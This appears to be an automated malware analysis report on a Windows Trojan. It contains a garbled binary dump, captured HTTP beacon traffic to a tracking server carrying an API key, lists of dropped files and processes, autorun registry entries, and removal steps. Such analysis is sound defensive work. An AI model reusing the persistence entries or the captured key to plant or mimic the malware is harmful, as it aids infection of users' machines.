.0..9........~.........,".r...p.....($...o%...s&...........~..... ..*.
...0...........~..... ..*".......*.0...........~..... ..*".('....*Vs..
..((...t.........*..BSJB............v2.0.50727......l...$...#~......x.
..#Strings........D...#US.L.......#GUID...\.......#Blob...........W...
.......3........$...................(.................................
..............X.Z.....Z.....(...............;.................x.......
............;...J.;..........._....._...f._...6......._...X.....o.(...
/.Z.....z...........A.....A.........`.....1.....*._...W.....1.......(.
...._...s._.........................W.E.=...........E.=...........<<< skipped >>>
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=h4deijffra6fhatr5mvu5ehsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}....
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=53q45kd7rh68s5ke28rojvt0l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}..
The Trojan connects to the servers at the folowing location(s):
h1 S.VS
h1 S.SV
GW637UYD5.exe_3836_rwx_001C0000_00010000:
.SgjP
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:2936
Sho9libi.exe:3808
OneTwo.exe:3724
%original file name%.exe:2748 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Roaming\pzdoadyr40k\43qnfuzifwk.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
%Program Files%\GW637UYD5K\GW637UYD5.exe (102799 bytes)
%Program Files%\GW637UYD5K\uninstaller.exe (38015 bytes)
%Program Files%\GW637UYD5K\GW637UYD5.exe.config (1 bytes)
%Program Files%\GW637UYD5K\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\SecondL.exe (657 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\SecondL.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\Sho9libi.exe (234441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\Sho9libi.exe.config (1 bytes)
%Program Files%\GW637UYD5K\cast.config (38 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"vwh5vg5nlkn" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\pzdoadyr40k\43qnfuzifwk.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_HC6YU" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"T9DKARE21ZIDH36" = "%Program Files%\GW637UYD5K\GW637UYD5.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.